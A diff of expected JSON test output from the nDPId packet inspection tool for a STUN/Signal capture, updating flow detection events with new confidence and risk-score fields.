+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956886,"flow_last_seen":1636901956886,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901956886,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956899,"flow_last_seen":1636901956899,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901956899,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1636901956899,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901956899,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnuFAAEAR80TAqAypI563p6g8AbsAHKfZAAEAACESpEJpNFFIaG51aVlxTjI="}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956899,"flow_last_seen":1636901956899,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901956899,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956899,"flow_last_seen":1636901956899,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901956899,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956900,"flow_last_seen":1636901956900,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901956900,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1636901956900,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901956900,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwevFAAEARy\/3AqAyprP15f6g8S2YAHDXLAAEAACESpEJuRGJFSkJreUFwVW4="}
 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1636901956903,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"ts_msec":1636901956903,"pkt":"mt9Y+uvcCL6sCxduCABFAABwP61AAOARsjgjnrenwKgMqQ2WqDwAXIeiAQEAQCESpEJ3MXhZWGxMSlFtK2QAIAAIAAEPlHw9RVEAAQAIAAEuhl0v4ROAKwAIAAENliOet6eALAAIAAEAUCOet6eAIgAETm9uZYAoAARTHy4\/"}
@@ -46,10 +46,10 @@
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1636901956921,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901956921,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwevJAAEARy\/zAqAyprP15f5wOS2YAHEUhAAEAACESpEJOVFU1cXVJU2dZVFA="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956929,"flow_last_seen":1636901956929,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901956929,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1636901956929,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901956929,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnuJAAEAR80PAqAypI563p5wOAbsAHAwRAAEAACESpEJneHI1SHRPK0tqKzc="}
-00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956929,"flow_last_seen":1636901956929,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901956929,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956929,"flow_last_seen":1636901956929,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901956929,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956930,"flow_last_seen":1636901956930,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901956930,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1636901956930,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901956930,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnuNAAEAR80LAqAypI563p5wODZYAHNwWAAEAACESpEI1alVGbDBvdmFLRGs="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956930,"flow_last_seen":1636901956930,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901956930,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956930,"flow_last_seen":1636901956930,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901956930,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1636901956946,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"ts_msec":1636901956946,"pkt":"mt9Y+uvcCL6sCxduCABFAABwP65AAOQRrjcjnrenwKgMqQ2WnA4AXORTAQEAQCESpEI1alVGbDBvdmFLRGsAIAAIAAEPlXw9RVEAAQAIAAEuh10v4ROAKwAIAAENliOet6eALAAIAAEAUCOet6eAIgAETm9uZYAoAAT10UAM"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1636901956960,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1636901956960,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nuZAAEAR8zfAqAypI563p6g8AbsAJMHVAAMACCESpEJwYTVMazRiQkhvWTEAGQAEEQAAAA=="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1636901956962,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1636901956962,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nudAAEAR8zbAqAypI563p5wODZYAJOqGAAMACCESpEJuWjVNSmNUejZrc3YAGQAEEQAAAA=="}
@@ -65,16 +65,16 @@
 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1636901958294,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"ts_msec":1636901958294,"pkt":"CL6sCxdumt9Y+uvcCABFAAB8azVAAEARa5jAqAypEsODj6g87uQAaP5FAAEATCESpEJyRHdyaGtEci8vOWUABgAJV0pzdTptTndxAAAAwFcABAADAAqAKgAIbYcgPZwg8UAAJAAEbn8e\/wAIABR\/b\/AcoEEqLjwzw3SbmvWontQU34AoAARPt0SR"}
 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1636901958378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1636901958378,"pkt":"mt9Y+uvcCL6sCxduCABFSABcrnFAAAMRZTQSw4OPwKgMqe7kqDwASOO3AQEALCESpEJyRHdyaGtEci8vOWUAIAAIAAEPmHw9RVEACAAUZTe+q2TI1x26\/6LLBdUUDVZaZoOAKAAEsQfEQQ=="}
 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1636901958378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"ts_msec":1636901958378,"pkt":"mt9Y+uvcCL6sCxduCABFSAB8rnJAAAMRZRMSw4OPwKgMqe7kqDwAaODiAAEATCESpEJ2dFg5dWZIQUdCakMABgAJbU53cTpXSnN1AAAAwFcABAADA4SAKQAIQYCdgvFBqWUAJAAEbn8g\/wAIABSzQMYtF7YKfV2BCR2ZgRKFjKrZ7YAoAASRLc2k"}
-00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901958294,"flow_last_seen":1636901958378,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1636901958378,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":43068,"dst_port":61156,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN","breed":"Acceptable","category":"Network"}}
-00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1636901956900,"flow_last_seen":1636901967653,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1636901967653,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
-00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1636901956921,"flow_last_seen":1636901967684,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1636901967684,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39950,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
-00639{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":289,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1636901936083,"flow_last_seen":1636901987911,"flow_idle_time":120000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1636901998588,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP.AmazonAWS","breed":"Acceptable","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901958294,"flow_last_seen":1636901958378,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1636901958378,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":43068,"dst_port":61156,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1636901956900,"flow_last_seen":1636901967279,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636901967279,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1636901956921,"flow_last_seen":1636901967684,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1636901967684,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39950,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
+00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":289,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1636901936083,"flow_last_seen":1636901987911,"flow_idle_time":120000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1636901998588,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998588,"flow_last_seen":1636901998588,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901998588,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1636901998588,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901998588,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwgdlAAEARxRXAqAyprP15f7qXS2YAHLUpAAEAACESpEJFRDdhYWpCejZ6NGY="}
-00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998588,"flow_last_seen":1636901998588,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901998588,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
+00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998588,"flow_last_seen":1636901998588,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901998588,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998589,"flow_last_seen":1636901998589,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901998589,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1636901998589,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901998589,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwgdpAAEARxRTAqAyprP15f5RSS2YAHI3jAAEAACESpEJHZko4WW5Ca1ZEVTk="}
-00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998589,"flow_last_seen":1636901998589,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901998589,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
+00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998589,"flow_last_seen":1636901998589,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901998589,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998637,"flow_last_seen":1636901998637,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901998637,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1636901998637,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901998637,"pkt":"CL6sCxdumt9Y+uvcCABFAAAw3EdAAEAR8rLAqAypI55607qXAbsAHB+DAAEAACESpEJDTUpIUUxOenE3VDQ="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998637,"flow_last_seen":1636901998637,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901998637,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -88,56 +88,56 @@
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1636901998654,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1636901998654,"pkt":"CL6sCxdumt9Y+uvcCABFAAA43E1AAEAR8qTAqAypI55605RSDZYAJBd3AAMACCESpEJOTG9MWFNjWDdLU3cAGQAEEQAAAA=="}
